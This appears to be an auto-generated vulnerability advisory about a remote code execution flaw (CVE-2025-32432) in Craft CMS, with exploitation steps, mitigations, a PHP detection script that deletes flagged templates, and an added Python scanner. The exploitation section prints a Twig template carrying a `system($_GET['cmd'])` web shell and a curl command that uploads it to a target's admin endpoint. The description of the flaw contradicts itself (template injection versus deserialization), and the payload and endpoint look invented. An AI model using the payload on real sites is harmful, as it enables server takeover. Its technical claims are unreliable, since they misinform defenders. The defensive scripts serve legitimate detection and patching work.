How the CVE Works
CVE-2025-32432 in Craft CMS allows remote code execution through improper input validation in template rendering. The vulnerability occurs when malicious Twig templates containing crafted PHP code are processed by the CMS. Attackers exploit insecure deserialization during template caching, enabling arbitrary command execution. The flaw exists in Craft’s template compilation logic where user-supplied input isn’t properly sanitized before being written to cache files. When these cached templates are executed, the embedded malicious code runs with web server privileges.
DailyCVE Form
Platform: Craft CMS
Version: 3.0.0-RC1 to 5.6.16
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2025-04-25
What Undercode Says:
Exploitation:
1. Craft malicious Twig template with PHP payload:
{{ {'foo': 'bar'}|json_encode|raw }} {% php %}system($_GET['cmd']);{% endphp %}
2. Upload via vulnerable endpoint:
curl -X POST "http://target/cms/admin/actions/templates/save" -d "template=malicious.twig&content=<PAYLOAD>"
Protection:
1. Immediate upgrade command:
composer require craftcms/cms:5.6.17
2. .htaccess mitigation (denies direct web access to .twig and .php files; place it in the templates directory rather than the web root, otherwise web/index.php is blocked too; on Apache 2.4 without mod_access_compat the directive is "Require all denied"):
<FilesMatch "\.(twig|php)$">
    Deny from all
</FilesMatch>
3. Server-side detection script (the original glob and regex lost their `*` characters; restored here, and the match tolerates whitespace and a `-` trim marker inside the tag):
<?php
// Scan the templates directory for Twig files that carry a {% php %} ... {% endphp %} block.
// The page's chosen response is to delete the file; copy it aside first if you need it as evidence.
foreach (glob("templates/*.twig") as $file) {
    if (preg_match('/{%-?\s*php\s*.*?%}/is', file_get_contents($file))) {
        unlink($file);
    }
}
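As an added example (not code from this page or from the Craft CMS project), the following Python script does the same template check as the PHP snippet above but reports each finding with file and line number instead of deleting anything, and it also tells you whether a Craft version string falls inside the affected range 3.0.0-RC1 to 5.6.16 stated above. The version parser, the `{% php %}` tag pattern and the sample template contents are constructed for illustration; the script writes the samples to a temporary directory so it runs offline.

```python
import re
import tempfile
from pathlib import Path

# Twig tag the page identifies as the payload carrier: {% php %} ... {% endphp %}
# (also matches the whitespace-trimming form {%- php -%}).
PHP_TAG = re.compile(r"{%-?\s*php\b", re.IGNORECASE)

FIRST_AFFECTED = (3, 0, 0)  # 3.0.0-RC1 is the earliest affected release on the page
FIXED = (5, 6, 17)          # first fixed release named on the page

# Constructed sample data, not real site content.
SAMPLE_TEMPLATES = {
    "index.twig": "{% extends '_layout' %}\n{% block content %}{{ entry.title }}{% endblock %}\n",
    "_partials/nav.twig": "<ul>{% for page in pages %}<li>{{ page.title }}</li>{% endfor %}</ul>\n",
    "_hidden/dropped.twig": "{{ 'x'|raw }}\n{% php %}/* anything here runs as PHP */{% endphp %}\n",
}


def parse_version(version: str):
    """Split '5.6.16' or '3.0.0-RC1' into ((5, 6, 16), None) / ((3, 0, 0), 'RC1')."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z]+\d*))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised Craft version: {version!r}")
    return (int(m[1]), int(m[2]), int(m[3])), m[4]


def is_affected(version: str) -> bool:
    """True when version lies in [3.0.0-RC1, 5.6.16].

    A pre-release of the fixed version (e.g. 5.6.17-RC1) sorts before 5.6.17 and is
    therefore still treated as affected; pre-releases of 3.0.0 before RC1 are not
    distinguished, which is a simplification.
    """
    core, pre = parse_version(version)
    if core < FIRST_AFFECTED:
        return False
    if core > FIXED or (core == FIXED and pre is None):
        return False
    return True


def find_php_tags(name: str, text: str):
    """Return (name, line_no, stripped line) for every line containing a {% php %} tag."""
    return [
        (name, n, line.strip())
        for n, line in enumerate(text.splitlines(), 1)
        if PHP_TAG.search(line)
    ]


def scan_templates(root) -> list:
    """Recursively scan root for *.twig files; report hits instead of deleting."""
    root = Path(root)
    hits = []
    for path in sorted(root.rglob("*.twig")):
        rel = path.relative_to(root).as_posix()
        hits.extend(find_php_tags(rel, path.read_text(errors="replace")))
    return hits


def demo() -> list:
    """Write the constructed samples to a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, text in SAMPLE_TEMPLATES.items():
            p = Path(tmp, name)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(text)
        return scan_templates(tmp)


if __name__ == "__main__":
    for v in ("2.9.9", "3.0.0-RC1", "4.5.0", "5.6.16", "5.6.17"):
        print(f"Craft {v}: {'AFFECTED' if is_affected(v) else 'not affected'}")
    for name, line_no, line in demo():
        print(f"{name}:{line_no}: {line}")
```

Point `scan_templates()` at the real templates directory of a Craft install to get a list you can review before acting on it; a hit in a file nobody remembers creating is the thing to investigate.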
Forensics:
Check log entries with:
grep -r "template.compile" /var/log/craft/
Analytics:
- Attack vector: Template injection
- CVSS: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- Exploitability: No auth required
- Patch diff: github.com/craftcms/cms/commit/e1c8544
Sources:
Reported By: github.com
Extra Source Hub:
Undercode